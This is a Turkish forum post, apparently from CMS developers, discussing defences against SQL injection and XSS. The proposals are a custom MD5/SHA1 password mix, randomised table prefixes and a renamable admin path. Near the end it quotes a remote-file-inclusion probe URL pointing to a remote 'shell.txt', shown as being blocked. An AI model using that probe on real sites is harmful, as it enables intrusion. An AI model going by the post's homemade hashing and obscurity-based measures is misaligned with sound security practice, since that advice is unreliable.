bartuc un söylediğide mantıklı kendi algoritmamızı şifre kısmında kullanmalıyız ki açık kaynaktaki açık sorunları doğmasın %100 yoktur ama incelenir sha1 ve md5 olarak 2 ayrı tablo yazıp oradan sistem in kendi mantığına göre sondan 2 tane baştan 1 tane falan gibi alıp karışık birşeyler yapmak gerekecek snrm + md5 sha1 ayrı tablolar ayrı okunma sistemi
username='' and userpass='' değil yani oldukça güzel bir koruma olacak kanısındayım
ama şuda var yönetici adresini değişince blog a giriş yapamazlar zaten
+ mysql prefixleri değişebilir olmalı hatta bunu kurulumda zorunlu kılarsam sql injeksiyonların önü temelli kapanaabilir mesala
wp_admins tir %90 wordpress te nuke de nuke_authors tu nuke de bunu deişince
uoıh34_authors yapınca adam nın sallama yoluyla bulması çok zor olacak şifreyi ayrı bir algoritma yönetim sayfa adını kişinin kendi isteiğine göre dğeişmesi ve sql tablo adlarını değişmesi oldukça iyi olacaktır bence güvenlik açısından kaldı geriye xss
Xss Hacki Engellemek | Son zamanlarda bir Çok ki?inin can?n? yakan hack y | Makaleler-Dersler
burada vardı <script> falan görünce die olarak çıktı veriyorpost ta falan nerede
(makalede sorun var az önce farkettim db ye atarken addslashes çift slashes yapmış kodlarda okurken stripslashes ikisini birden silmiş slashes lerin slashses lerle çalışıyor yani )
http://www.phptrcms.com/?x=http://ww....com/shell.txt Yazdığınız Kodlar İzinli Kodlar Listesinde Değil AMAN ALLAH'IM HACKER N'OLUR BENİ HACKLAMA
gibi ...
